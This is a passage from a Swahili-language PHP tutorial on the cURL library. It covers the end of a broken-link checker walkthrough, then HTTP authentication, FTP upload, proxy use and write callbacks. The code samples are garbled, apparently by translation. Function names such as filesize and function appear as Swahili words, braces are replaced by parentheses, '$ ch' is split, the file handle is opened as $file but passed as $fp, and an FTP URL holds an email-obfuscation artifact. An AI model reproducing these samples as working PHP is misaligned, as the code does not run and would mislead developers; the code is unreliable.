7. 7. Taarifa imethibitishwa hapa. Kama matokeo ya kutekeleza ombi, safu itarejeshwa;
8. 8. Safu iliyorejeshwa ina kidhibiti cha cURL. Tutaitumia kuchagua taarifa kuhusu ombi tofauti la cURL;
9. 9. Ikiwa kiungo kilikuwa kimekufa, au hati imepitwa na wakati, basi hatupaswi kutafuta msimbo wowote wa http;
10. 10. Ikiwa kiungo kiliturudishia ukurasa wa 404, basi msimbo wa http utakuwa na thamani 404;
11. 11. Vinginevyo, tuna kiungo cha kufanya kazi mbele yetu. (Unaweza kuongeza hundi za ziada kwa msimbo wa makosa 500, nk ...);
12. 12. Kisha tunaondoa kidhibiti cha cURL kwa sababu hatuhitaji tena;
13. 13. Sasa tunaweza kuongeza url nyingine na kuendesha kila kitu tulichozungumza hapo awali;
14. 14. Katika hatua hii, script inakamilisha kazi yake. Tunaweza kuondoa kila kitu tusichohitaji na kutoa ripoti;
15. 15. Hatimaye, tutaandika kitendakazi ambacho kitaongeza url kwenye kidhibiti. Tofauti tuli ya $index itaongezwa kila wakati chaguo hili la kukokotoa linapoitwa.

Nilitumia maandishi haya kwenye blogi yangu (na viungo vingine vilivyovunjika ambavyo niliongeza kwa makusudi ili kuijaribu) na nikapata matokeo yafuatayo:

Kwa upande wangu, hati ilichukua chini ya sekunde 2 kutambaa kupitia URL 40. Ongezeko la utendaji ni muhimu wakati wa kufanya kazi na URL nyingi zaidi. Ukifungua miunganisho kumi kwa wakati mmoja, hati inaweza kutekeleza mara kumi haraka.

Maneno machache kuhusu chaguo zingine muhimu za cURL

Uthibitishaji wa HTTP

Ikiwa URL ina uthibitishaji wa HTTP, basi unaweza kutumia hati ifuatayo kwa urahisi:

$url = "http://www.somesite.com/members/"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // taja jina la mtumiaji na nenosiri curl_setopt($ch, CURLOPT_USERPWD, "jina langu la mtumiaji:nenosiri langu"); // ikiwa uelekezaji kwingine unaruhusiwa curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // kisha uhifadhi data yetu katika cURL curl_setopt($ch, CURLOPT_UNRESTRICTED_AUTH, 1); $output = curl_exec($ch); curl_close($ch);

Upakiaji wa FTP

PHP pia ina maktaba ya kufanya kazi na FTP, lakini hakuna kinachokuzuia kutumia zana za cURL hapa:

// fungua faili $file = fopen("/path/to/file", "r"); // url inapaswa kuwa na maudhui yafuatayo $url = "ftp://username: [barua pepe imelindwa]:21/path/to/new/file"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_UPLOAD, 1); curl_setopt($ch, CURLOPT_INFILE, $fp); curl_setopt($ch, CURLOPT_INFILESIZE, saizi ya faili("/njia/to/faili")); // bainisha ASCII mod curl_setopt($ch, CURLOPT_FTPASCII, 1); $output = curl_exec ($ ch); curl_close($ch);

Kwa kutumia Wakala

Unaweza kutekeleza ombi lako la URL kupitia proksi:

$ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"http://www.example.com"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // taja anwani curl_setopt($ch, CURLOPT_PROXY, "11.11.11.11:8080"); // ikiwa unahitaji kutoa jina la mtumiaji na nenosiri curl_setopt($ch, CURLOPT_PROXYUSERPWD,"user:pass"); $output = curl_exec($ch); curl_close($ch);

Vitendaji vya kupiga simu

Pia inawezekana kubainisha chaguo la kukokotoa ambalo litaanzishwa hata kabla ya ombi la cURL kukamilika. Kwa mfano, wakati maudhui ya majibu yanapakia, unaweza kuanza kutumia data bila kusubiri ipakie kikamilifu.

$ch = curl_init(); curl_setopt($ch, CURLOPT_URL,"http://net.tutsplus.com"); curl_setopt($ch, CURLOPT_WRITEFUNCTION,"progress_function"); curl_exec($ch); curl_close($ch); kazi progress_function($ch,$str) ( echo $str; return strlen($str); )

Chaguo la kukokotoa kama hili LAZIMA lirudishe urefu wa mfuatano, ambao ni sharti.

Hitimisho

Leo tumejifunza jinsi unavyoweza kutumia maktaba ya cURL kwa madhumuni yako ya ubinafsi. Natumaini ulifurahia makala hii.

Asante! Kuwa na siku njema!